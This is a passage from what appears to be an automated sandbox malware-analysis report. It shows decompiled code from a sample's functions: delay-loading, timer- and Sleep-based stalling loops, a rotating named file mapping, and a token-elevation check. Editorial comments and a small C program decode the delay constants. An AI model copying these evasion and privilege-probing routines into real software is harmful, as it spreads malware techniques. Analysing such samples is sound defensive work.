                                                  						if(_t116 != 0) {
                                                  							L32:
                                                  							 *_a8 = _t116;
                                                  							L33:
                                                  							_t85 =  *0xecd1a0; // 0x0
                                                  							if(_t85 != 0) {
                                                  								_v40 = _v40 & 0x00000000;
                                                  								_v48 = _t138;
                                                  								_v44 = _t116;
                                                  								 *_t85(5,  &_v72);
                                                  							}
                                                  							return _t116;
                                                  						} else {
                                                  							if(_t139[5] == _t116 || _t139[7] == _t116) {
                                                  								L27:
                                                  								_t116 = GetProcAddress(_t138, _v52);
                                                  								if(_t116 == 0) {
                                                  									_v40 = GetLastError();
                                                  									_t90 =  *0xecd19c; // 0x0
                                                  									if(_t90 != 0) {
                                                  										_t116 =  *_t90(4,  &_v72);
                                                  									}
                                                  									if(_t116 == 0) {
                                                  										_a4 =  &_v72;
                                                  										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                                                  										_t116 = _v44;
                                                  									}
                                                  								}
                                                  								goto L32;
                                                  							} else {
                                                  								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                                                  								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                                                  									_t116 =  *(_a4 + _v16);
                                                  									if(_t116 != 0) {
                                                  										goto L32;
                                                  									}
                                                  								}
                                                  								goto L27;
                                                  							}
                                                  						}
                                                  					}
                                                  					_t98 =  *0xecd1a0; // 0x0
                                                  					if(_t98 == 0) {
                                                  						L9:
                                                  						_t99 = LoadLibraryA(_v60); // executed
                                                  						_t138 = _t99;
                                                  						if(_t138 != 0) {
                                                  							L13:
                                                  							if(InterlockedExchange(_v28, _t138) == _t138) {
                                                  								FreeLibrary(_t138);
                                                  							} else {
                                                  								if(_t139[6] != 0) {
                                                  									_t102 = LocalAlloc(0x40, 8);
                                                  									if(_t102 != 0) {
                                                  										 *(_t102 + 4) = _t139;
                                                  										_t125 =  *0xecd198; // 0x0
                                                  										 *_t102 = _t125;
                                                  										 *0xecd198 = _t102;
                                                  									}
                                                  								}
                                                  							}
                                                  							goto L18;
                                                  						}
                                                  						_v40 = GetLastError();
                                                  						_t104 =  *0xecd19c; // 0x0
                                                  						if(_t104 == 0) {
                                                  							L12:
                                                  							_a8 =  &_v72;
                                                  							RaiseException(0xc06d007e, 0, 1,  &_a8);
                                                  							return _v44;
                                                  						}
                                                  						_t138 =  *_t104(3,  &_v72);
                                                  						if(_t138 != 0) {
                                                  							goto L13;
                                                  						}
                                                  						goto L12;
                                                  					}
                                                  					_t138 =  *_t98(1,  &_v72);
                                                  					if(_t138 != 0) {
                                                  						goto L13;
                                                  					}
                                                  					goto L9;
                                                  				}
                                                  				_t116 =  *_t82(0,  &_v72);
                                                  				if(_t116 != 0) {
                                                  					goto L33;
                                                  				}
                                                  				goto L6;
                                                  			}
Instruction addresses 0x00ecadf4-0x00ecb017 (address column of the listing; the instruction text itself was not captured)
                                                  0x00000000
                                                  0x00ecaf92
                                                  0x00ecaf80
                                                  0x00ecaf7b
                                                  0x00ecaec1
                                                  0x00ecaec8
                                                  0x00ecaed8
                                                  0x00ecaedb
                                                  0x00ecaee1
                                                  0x00ecaee5
                                                  0x00ecaf28
                                                  0x00ecaf34
                                                  0x00ecaf5d
                                                  0x00ecaf36
                                                  0x00ecaf3a
                                                  0x00ecaf40
                                                  0x00ecaf48
                                                  0x00ecaf4a
                                                  0x00ecaf4d
                                                  0x00ecaf53
                                                  0x00ecaf55
                                                  0x00ecaf55
                                                  0x00ecaf48
                                                  0x00ecaf3a
                                                  0x00000000
                                                  0x00ecaf34
                                                  0x00ecaeed
                                                  0x00ecaef0
                                                  0x00ecaef7
                                                  0x00ecaf07
                                                  0x00ecaf0a
                                                  0x00ecaf1a
                                                  0x00000000
                                                  0x00ecaf20
                                                  0x00ecaf01
                                                  0x00ecaf05
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00ecaf05
                                                  0x00ecaed2
                                                  0x00ecaed6
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00ecaed6
                                                  0x00ecaeaf
                                                  0x00ecaeb3
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000

                                                  APIs
                                                  • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ECAE5E
                                                  • LoadLibraryA.KERNELBASE(?), ref: 00ECAEDB
                                                  • GetLastError.KERNEL32 ref: 00ECAEE7
                                                  • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 00ECAF1A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                                  • String ID: $
                                                  • API String ID: 948315288-3993045852
                                                  • Opcode ID: c3b36cd93248e89d37025d3d03e878373fefd570ea754439745333b9a9c59d6d
                                                  • Instruction ID: 3299c3b17943bad252f874db4fd743c25df7e8cfe75cecc456b0f667c67debab
                                                  • Opcode Fuzzy Hash: c3b36cd93248e89d37025d3d03e878373fefd570ea754439745333b9a9c59d6d
                                                  • Instruction Fuzzy Hash: 4B814BB1A00209AFDB10CF99D985FAEB7F5AB48308F18903DE519E7250E772ED46CB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  Rendered as an image in the report (executed and not-executed blocks are colour-coded there); the edge list is omitted. Basic blocks of E00EC6786 and the calls they make:
                                                  • ec6786-ec67b2: memset, CreateWaitableTimerA
                                                  • ec67b8-ec6808: _allmul, SetWaitableTimer, WaitForMultipleObjects
                                                  • ec680f: call ec73fd
                                                  • ec683b-ec6864: call ec8504
                                                  • ec6871-ec6880: call ec3bf1
                                                  • ec688f-ec6897: HeapFree
                                                  • ec68a3-ec68ac: CloseHandle
                                                  • ec68bd-ec68d0: call eca1b0
                                                  • ec68e0-ec6908: _allmul, SetWaitableTimer, WaitForMultipleObjects
                                                  • ec6913-ec6919: GetLastError
                                                  C-Code - Quality: 83%
                                                  			E00EC6786(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                  				struct %anon52 _v8;
                                                  				long _v12;
                                                  				char _v16;
                                                  				char _v20;
                                                  				signed int _v24;
                                                  				intOrPtr _v32;
                                                  				union _LARGE_INTEGER _v36;
                                                  				intOrPtr _v40;
                                                  				void* _v44;
                                                  				void _v88;
                                                  				char _v92;
                                                  				struct %anon52 _t46;
                                                  				intOrPtr _t51;
                                                  				long _t53;
                                                  				void* _t54;
                                                  				struct %anon52 _t60;
                                                  				long _t64;
                                                  				signed int _t65;
                                                  				void* _t68;
                                                  				void* _t70;
                                                  				signed int _t71;
                                                  				intOrPtr _t73;
                                                  				intOrPtr _t76;
                                                  				void** _t78;
                                                  				void* _t80;
                                                  
                                                  				_t73 = __edx;
                                                  				_v92 = 0;
                                                  				memset( &_v88, 0, 0x2c);
                                                  				_t46 = CreateWaitableTimerA(0, 1, 0);
                                                  				_v44 = _t46;
                                                  				if(_t46 == 0) {
                                                  					_v8.LowPart = GetLastError();
                                                  				} else {
                                                  					_push(0xffffffff);
                                                  					_push(0xff676980);
                                                  					_push(0);
                                                  					_push( *0xecd240);
                                                  					_v20 = 0;
                                                  					_v16 = 0;
                                                  					L00ECB0C8();
                                                  					_v36.LowPart = _t46;
                                                  					_v32 = _t73;
                                                  					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                                  					_t51 =  *0xecd26c; // 0x33c
                                                  					_v40 = _t51;
                                                  					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                  					_v8.LowPart = _t53;
                                                  					if(_t53 == 0) {
                                                  						if(_a8 != 0) {
                                                  							L4:
                                                  							 *0xecd24c = 5;
                                                  						} else {
                                                  							_t68 = E00EC73FD(_t73); // executed
                                                  							if(_t68 != 0) {
                                                  								goto L4;
                                                  							}
                                                  						}
                                                  						_v12 = 0;
                                                  						L6:
                                                  						L6:
                                                  						if(_v12 == 1 && ( *0xecd260 & 0x00000001) == 0) {
                                                  							_v12 = 2;
                                                  						}
                                                  						_t71 = _v12;
                                                  						_t58 = _t71 << 4;
                                                  						_t76 = _t80 + (_t71 << 4) - 0x54;
                                                  						_t72 = _t71 + 1;
                                                  						_v24 = _t71 + 1;
                                                  						_t60 = E00EC8504(_t72, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
                                                  						_v8.LowPart = _t60;
                                                  						if(_t60 != 0) {
                                                  							goto L17;
                                                  						}
                                                  						_t65 = _v24;
                                                  						_t90 = _t65 - 3;
                                                  						_v12 = _t65;
                                                  						if(_t65 != 3) {
                                                  							goto L6;
                                                  						} else {
                                                  							_v8.LowPart = E00EC3BF1(_t72, _t90,  &_v92, _a4, _a8);
                                                  						}
                                                  						goto L12;
                                                  						L17:
                                                  						__eflags = _t60 - 0x10d2;
                                                  						if(_t60 != 0x10d2) {
                                                  							_push(0xffffffff);
                                                  							_push(0xff676980);
                                                  							_push(0);
                                                  							_push( *0xecd244);
                                                  							goto L21;
                                                  						} else {
                                                  							__eflags =  *0xecd248; // 0x0
                                                  							if(__eflags == 0) {
                                                  								goto L12;
                                                  							} else {
                                                  								_t60 = E00ECA1B0();
                                                  								_push(0xffffffff);
                                                  								_push(0xdc3cba00);
                                                  								_push(0);
                                                  								_push( *0xecd248);
                                                  								L21:
                                                  								L00ECB0C8();
                                                  								_v36.LowPart = _t60;
                                                  								_v32 = _t76;
                                                  								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
                                                  								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                  								__eflags = _t64;
                                                  								_v8.LowPart = _t64;
                                                  								if(_t64 == 0) {
                                                  									goto L6;
                                                  								} else {
                                                  									goto L12;
                                                  								}
                                                  							}
                                                  						}
                                                  						L25:
                                                  					}
                                                  					L12:
                                                  					_t78 =  &_v92;
                                                  					_t70 = 3;
                                                  					do {
                                                  						_t54 =  *_t78;
                                                  						if(_t54 != 0) {
                                                  							HeapFree( *0xecd238, 0, _t54);
                                                  						}
                                                  						_t78 =  &(_t78[4]);
                                                  						_t70 = _t70 - 1;
                                                  					} while (_t70 != 0);
                                                  					CloseHandle(_v44);
                                                  				}
                                                  				return _v8;
                                                  				goto L25;
                                                  			}

                                                  Instruction addresses for E00EC6786 above (the per-line mapping to the C code was lost in extraction): 0x00ec6786 to 0x00ec6923

                                                  APIs
                                                  • memset.NTDLL ref: 00EC679B
                                                  • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 00EC67A7
                                                  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 00EC67CC
                                                  • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 00EC67E8
                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00EC6801
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 00EC6897
                                                  • CloseHandle.KERNEL32(?), ref: 00EC68A6
                                                  • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 00EC68E0
                                                  • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,00EC2417,?), ref: 00EC68F6
                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00EC6901
                                                    • Part of subcall function 00EC73FD: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,03009388,00000000,?,7519F710,00000000,7519F730), ref: 00EC744C
                                                    • Part of subcall function 00EC73FD: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,030093C0,?,00000000,30314549,00000014,004F0053,0300937C), ref: 00EC74E9
                                                    • Part of subcall function 00EC73FD: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00EC6814), ref: 00EC74FB
                                                  • GetLastError.KERNEL32 ref: 00EC6913
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                  • String ID:
                                                  • API String ID: 3521023985-0
                                                  • Opcode ID: ebebee60e038dee115b0081d4133ee4c7cc6ea879e200406ebe4f91f9450ed3e
                                                  • Instruction ID: 95245a3186f2cad11b624f42cbaf9741f1c0d603719f7967b73acdfabf4f27d4
                                                  • Opcode Fuzzy Hash: ebebee60e038dee115b0081d4133ee4c7cc6ea879e200406ebe4f91f9450ed3e
                                                  • Instruction Fuzzy Hash: 88517F71805228EECF149F95DD45EEEBFB8EF49324F205129F914F21A0D7728A46CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%
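The two delays in E00EC6786 are produced by _allmul, the CRT 64-bit multiply. The sample pushes a 32-bit count taken from a global (0xecd240 on the first wait, 0xecd244 or 0xecd248 on the retry path depending on the 0x10d2 status) together with the 64-bit constant 0xFFFFFFFF:FF676980 or 0xFFFFFFFF:DC3CBA00, stores the product in a LARGE_INTEGER and hands it to SetWaitableTimer, where a negative value is a relative due time in 100-nanosecond units. The program below is an added example written by the editor; it is not code from the sample or from the Joe Sandbox report. It decodes those two constants, turns a due time back into seconds, and bounds the per-pass Sleep of the loop in E0040163F decompiled further down the page (SwitchToThread result plus wMilliseconds % 9, shifted left by 5). Reading the globals as plain counts in seconds and minutes is an assumption that follows only from the multipliers; the Windows-only helper at the end mirrors the timer-plus-second-handle wait as an illustration and is not a reproduction of the sample.

```c
/* Added example (editor's; not code from the sample or from Joe Sandbox).
 * Decodes the delay arithmetic seen in E00EC6786 (waitable timer) and
 * E0040163F (Sleep loop). Assumption: the globals the sample multiplies are
 * plain delay counts; the multipliers fix their unit (seconds or minutes). */
#include <stdint.h>
#include <stdio.h>

/* SetWaitableTimer takes 100-nanosecond units; a negative value is relative. */
#define FT_UNITS_PER_SEC 10000000LL

/* Rebuild the 64-bit multiplier from the two dwords the sample pushes for
 * _allmul (low dword first in the listing: 0xFF676980, then 0xFFFFFFFF). */
static int64_t allmul_const(uint32_t lo, uint32_t hi) {
    return (int64_t)(((uint64_t)hi << 32) | lo);
}

/* _allmul(count, 0, mul_lo, mul_hi) as the sample calls it: count is a
 * zero-extended 32-bit global, the product is the timer due time. */
static int64_t due_time_from_allmul(uint32_t count, uint32_t mul_lo, uint32_t mul_hi) {
    return (int64_t)count * allmul_const(mul_lo, mul_hi);
}

/* Relative due time back to a positive number of seconds. */
static int64_t due_time_to_seconds(int64_t due) {
    return -due / FT_UNITS_PER_SEC;
}

/* One pass of the E0040163F loop sleeps
 *   Sleep((SwitchToThread() + (wMilliseconds % 9)) << 5)
 * SwitchToThread returns 0 or nonzero (1 in practice); wMilliseconds % 9 is 0..8. */
static unsigned sleep_ms_for(unsigned switch_result, unsigned ms_field) {
    return (switch_result + (ms_field % 9u)) << 5;
}

/* Upper bound of a single pass: (1 + 8) << 5. */
static unsigned max_sleep_ms_per_iteration(void) {
    return sleep_ms_for(1u, 8u);
}

#ifdef _WIN32
#include <windows.h>
/* Same shape as the sample's wait: a one-shot relative timer plus a second
 * handle (the sample keeps one at 0xecd26c), WaitForMultipleObjects on both.
 * Return value 0 means the timer fired, 1 means the other handle signalled. */
static DWORD wait_timer_or_handle(HANDLE other, int64_t due_100ns) {
    HANDLE handles[2];
    LARGE_INTEGER due;
    DWORD r;
    handles[0] = CreateWaitableTimerA(NULL, TRUE, NULL);
    handles[1] = other;
    if (handles[0] == NULL)
        return WAIT_FAILED;
    due.QuadPart = due_100ns;
    SetWaitableTimer(handles[0], &due, 0, NULL, NULL, FALSE);
    r = WaitForMultipleObjects(2, handles, FALSE, INFINITE);
    CloseHandle(handles[0]);
    return r;
}
#endif

int main(void) {
    /* The two multipliers from the listing, low dword then high dword. */
    printf("0xFFFFFFFF:FF676980 = %lld  (-1 s in 100ns units)\n",
           (long long)allmul_const(0xFF676980u, 0xFFFFFFFFu));
    printf("0xFFFFFFFF:DC3CBA00 = %lld  (-60 s in 100ns units)\n",
           (long long)allmul_const(0xDC3CBA00u, 0xFFFFFFFFu));
    /* Constructed counts; the real values live in the sample's globals. */
    printf("count 30 via 0xFF676980 -> %lld s\n",
           (long long)due_time_to_seconds(due_time_from_allmul(30u, 0xFF676980u, 0xFFFFFFFFu)));
    printf("count 2 via 0xDC3CBA00  -> %lld s\n",
           (long long)due_time_to_seconds(due_time_from_allmul(2u, 0xDC3CBA00u, 0xFFFFFFFFu)));
    printf("max Sleep per E0040163F pass: %u ms\n", max_sleep_ms_per_iteration());
    return 0;
}
```

Read this way, the two globals become a wall-clock stall estimate: a count of 30 at 0xecd240 is a 30 s wait before the first E00EC8504 call, and the 0xDC3CBA00 branch scales the same count in minutes. The Sleep loop in E0040163F caps each pass at 288 ms, so its total stall is governed by how many times E004018F4 returns 0xc, not by the Sleep argument itself.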

                                                  Control-flow Graph

                                                  Rendered as an image in the report (executed and not-executed blocks are colour-coded there); the edge list is omitted. Basic blocks of E0040163F and the calls they make:
                                                  • 40163f-401652: call 401850
                                                  • 401659-401690: GetSystemTime, SwitchToThread, call 4018f4, Sleep
                                                  • 4016a0-4016ab: call 401538
                                                  • 4016ad-4016bf: GetLongPathNameW
                                                  • 4016c1-4016d2: call 401de1
                                                  • 4016d4-4016da: GetLongPathNameW, call 401dfc
                                                  • 4016ef-40170a: call 4012dc
                                                  • 40170c-40171a: WaitForSingleObject
                                                  • 40171c-401721: GetExitCodeThread
                                                  • 401727-40172e: CloseHandle
                                                  • 401730-401732: GetLastError
                                                  • 40173d: GetLastError
                                                  C-Code - Quality: 79%
                                                  			E0040163F(char _a4) {
                                                  				long _v8;
                                                  				struct _SYSTEMTIME _v24;
                                                  				char _v48;
                                                  				void* __edi;
                                                  				long _t20;
                                                  				int _t22;
                                                  				long _t25;
                                                  				long _t26;
                                                  				long _t30;
                                                  				void* _t36;
                                                  				intOrPtr _t38;
                                                  				intOrPtr _t43;
                                                  				signed int _t44;
                                                  				void* _t48;
                                                  				signed int _t51;
                                                  				void* _t54;
                                                  				intOrPtr* _t55;
                                                  
                                                  				_t20 = E00401850();
                                                  				_v8 = _t20;
                                                  				if(_t20 != 0) {
                                                  					return _t20;
                                                  				}
				do {
					GetSystemTime( &_v24);
					_t22 = SwitchToThread();
					asm("cdq");
					_t44 = 9;
					_t51 = _t22 + (_v24.wMilliseconds & 0x0000ffff) % _t44; // jitter: SwitchToThread() result (0 or 1) plus wMilliseconds mod 9, i.e. 0..9
					_t25 = E004018F4(0, _t51); // executed
					_v8 = _t25;
					Sleep(_t51 << 5); // executed; jitter * 32 ms, so at most 288 ms per attempt
					_t26 = _v8;
				} while (_t26 == 0xc); // retry while E004018F4 returns 0xc: this is the Sleep-based stalling loop
                                                  				if(_t26 != 0) {
                                                  					L18:
                                                  					return _t26;
                                                  				}
                                                  				if(_a4 != 0) {
                                                  					L11:
                                                  					_push(0);
                                                  					_t54 = E004012DC(E0040135A,  &_v48);
                                                  					if(_t54 == 0) {
                                                  						_v8 = GetLastError();
                                                  					} else {
                                                  						_t30 = WaitForSingleObject(_t54, 0xffffffff);
                                                  						_v8 = _t30;
                                                  						if(_t30 == 0) {
                                                  							GetExitCodeThread(_t54,  &_v8);
                                                  						}
                                                  						CloseHandle(_t54);
                                                  					}
                                                  					_t26 = _v8;
                                                  					if(_t26 == 0xffffffff) {
                                                  						_t26 = GetLastError();
                                                  					}
                                                  					goto L18;
                                                  				}
                                                  				if(E00401538(_t44,  &_a4) != 0) {
                                                  					 *0x404138 = 0;
                                                  					goto L11;
                                                  				}
                                                  				_t43 = _a4;
                                                  				_t55 = __imp__GetLongPathNameW;
                                                  				_t36 =  *_t55(_t43, 0, 0); // executed
                                                  				_t48 = _t36;
                                                  				if(_t48 == 0) {
                                                  					L9:
                                                  					 *0x404138 = _t43;
                                                  					goto L11;
                                                  				}
                                                  				_t14 = _t48 + 2; // 0x2
                                                  				_t38 = E00401DE1(_t48 + _t14);
                                                  				 *0x404138 = _t38;
                                                  				if(_t38 == 0) {
                                                  					goto L9;
                                                  				}
                                                  				 *_t55(_t43, _t38, _t48); // executed
                                                  				E00401DFC(_t43);
                                                  				goto L11;
                                                  			}

                                                  APIs
                                                    • Part of subcall function 00401850: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0040164B,751463F0), ref: 0040185F
                                                    • Part of subcall function 00401850: GetVersion.KERNEL32 ref: 0040186E
                                                    • Part of subcall function 00401850: GetCurrentProcessId.KERNEL32 ref: 00401885
                                                    • Part of subcall function 00401850: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 0040189E
                                                  • GetSystemTime.KERNEL32(?,00000000,751463F0), ref: 0040165D
                                                  • SwitchToThread.KERNEL32 ref: 00401663
                                                    • Part of subcall function 004018F4: VirtualAlloc.KERNELBASE(00000000,0040167D,00003000,00000004,?,?,0040167D,00000000), ref: 0040194A
                                                    • Part of subcall function 004018F4: memcpy.NTDLL(?,?,0040167D,?,?,0040167D,00000000), ref: 004019DC
                                                    • Part of subcall function 004018F4: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,0040167D,00000000), ref: 004019F7
                                                  • Sleep.KERNELBASE(00000000,00000000), ref: 00401684
                                                  • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 004016B9
                                                  • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 004016D7
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 0040170F
                                                  • GetExitCodeThread.KERNEL32(00000000,?), ref: 00401721
                                                  • CloseHandle.KERNEL32(00000000), ref: 00401728
                                                  • GetLastError.KERNEL32(?,00000000), ref: 00401730
                                                  • GetLastError.KERNEL32 ref: 0040173D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.644892830.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.644956841.0000000000405000.00000040.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastLongNamePathProcessThreadVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleObjectOpenSingleSleepSwitchSystemTimeVersionWaitmemcpy
                                                  • String ID:
                                                  • API String ID: 2280543912-0
                                                  • Opcode ID: 38b90e2e6d3d84ffd9fbb7185742547c764fdfbad962231990aa8721995cac35
                                                  • Instruction ID: 3c547408fdc9ceb87cb50058a61b233f89e190b219f0f48a38aaaf96b39e067b
                                                  • Opcode Fuzzy Hash: 38b90e2e6d3d84ffd9fbb7185742547c764fdfbad962231990aa8721995cac35
                                                  • Instruction Fuzzy Hash: 3D31A272901214ABCB10EFA59D8499F7ABDEF84351B14463BF901F32A0E738DA409B69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 74%
                                                  			E00EC1B2F(intOrPtr __edx, void** _a4, void** _a8) {
                                                  				intOrPtr _v8;
                                                  				struct _FILETIME* _v12;
                                                  				short _v56;
                                                  				struct _FILETIME* _t12;
                                                  				intOrPtr _t13;
                                                  				void* _t17;
                                                  				void* _t21;
                                                  				intOrPtr _t27;
                                                  				long _t28;
                                                  				void* _t30;
                                                  
                                                  				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L00ECB0C2(); // _aulldiv: FILETIME / 0x19254D38000 = 1,728,000,000,000 100-ns ticks = exactly 48 hours, so the object name derived below changes every two days
                                                  				_push(_t12);
                                                  				_v12 = _t12;
                                                  				_t13 =  *0xecd27c; // 0x213a5a8
                                                  				_t5 = _t13 + 0xece862; // 0x3008e0a
                                                  				_t6 = _t13 + 0xece59c; // 0x530025
                                                  				_push(0x16);
                                                  				_push( &_v56);
                                                  				_v8 = _t27;
				L00ECAD5A(); // _snwprintf into the 22-wchar _v56 buffer; the format string lives in the data section and is not shown here, the 48-hour quotient is among the pushed arguments
				_t17 = CreateFileMappingW(0xffffffff, 0xecd2a8, 4, 0, 0x1000,  &_v56); // executed; pagefile-backed, PAGE_READWRITE, 4 KiB, named from _v56, SECURITY_ATTRIBUTES from the data section
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) { // ERROR_ALREADY_EXISTS: another instance created this section earlier
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed; FILE_MAP_READ | FILE_MAP_WRITE
                                                  						if(_t21 == 0) {
                                                  							_t28 = GetLastError();
                                                  							if(_t28 != 0) {
                                                  								goto L6;
                                                  							}
                                                  						} else {
                                                  							 *_a4 = _t30;
                                                  							 *_a8 = _t21;
                                                  							_t28 = 0;
                                                  						}
					} else {
						_t28 = 2; // ERROR_FILE_NOT_FOUND: no section existed before this call
						L6:
						CloseHandle(_t30); // also discards the section that CreateFileMappingW just created
                                                  					}
                                                  				}
                                                  				return _t28;
                                                  			}

                                                  APIs
                                                  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00EC22EA,?,?,4D283A53,?,?), ref: 00EC1B3B
                                                  • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00EC1B51
                                                  • _snwprintf.NTDLL ref: 00EC1B76
                                                  • CreateFileMappingW.KERNELBASE(000000FF,00ECD2A8,00000004,00000000,00001000,?), ref: 00EC1B92
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00EC22EA,?,?,4D283A53), ref: 00EC1BA4
                                                  • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00EC1BBB
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00EC22EA,?,?), ref: 00EC1BDC
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00EC22EA,?,?,4D283A53), ref: 00EC1BE4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
• Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
• Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                  • String ID:
                                                  • API String ID: 1814172918-0
                                                  • Opcode ID: dbb564dbe760a42c49e2dd9aac76bb104ffad9db179294e84398032103a7b7da
                                                  • Instruction ID: f4171833578ef8be31c1b44e295968a3b3268f1b0f6d34229aa6dec2cacb773c
                                                  • Opcode Fuzzy Hash: dbb564dbe760a42c49e2dd9aac76bb104ffad9db179294e84398032103a7b7da
                                                  • Instruction Fuzzy Hash: 6421F072604208FFC721ABA5CD06FDA77A8AF49710F2501A5F609F72A1E672A9078B50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  control_flow_graph 258 ec924f-ec926a 259 ec9309-ec9315 258->259 260 ec9270-ec9289 OpenProcessToken 258->260 261 ec9308 260->261 262 ec928b-ec92b6 GetTokenInformation * 2 260->262 261->259 263 ec92fe-ec9307 CloseHandle 262->263 264 ec92b8-ec92c5 call ec2049 262->264 263->261 267 ec92fd 264->267 268 ec92c7-ec92d8 GetTokenInformation 264->268 267->263 269 ec92da-ec92f4 GetSidSubAuthorityCount GetSidSubAuthority 268->269 270 ec92f7-ec92f8 call ec9039 268->270 269->270 270->267
                                                  C-Code - Quality: 100%
                                                  			E00EC924F(long* _a4) {
                                                  				long _v8;
                                                  				void* _v12;
                                                  				void _v16;
                                                  				long _v20;
                                                  				int _t33;
                                                  				void* _t46;
                                                  
				_v16 = 1; // default: report the token as elevated
				_v20 = 0x2000; // default: SECURITY_MANDATORY_MEDIUM_RID
				if( *0xecd25c > 5) { // global compared with 5, presumably the OS major version: elevation and integrity levels exist only on Vista (6.0) and later
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) { // current process, TOKEN_READ
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed; 0x14 = TokenElevation, _v16 receives TOKEN_ELEVATION.TokenIsElevated
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed; 0x19 = TokenIntegrityLevel, size query
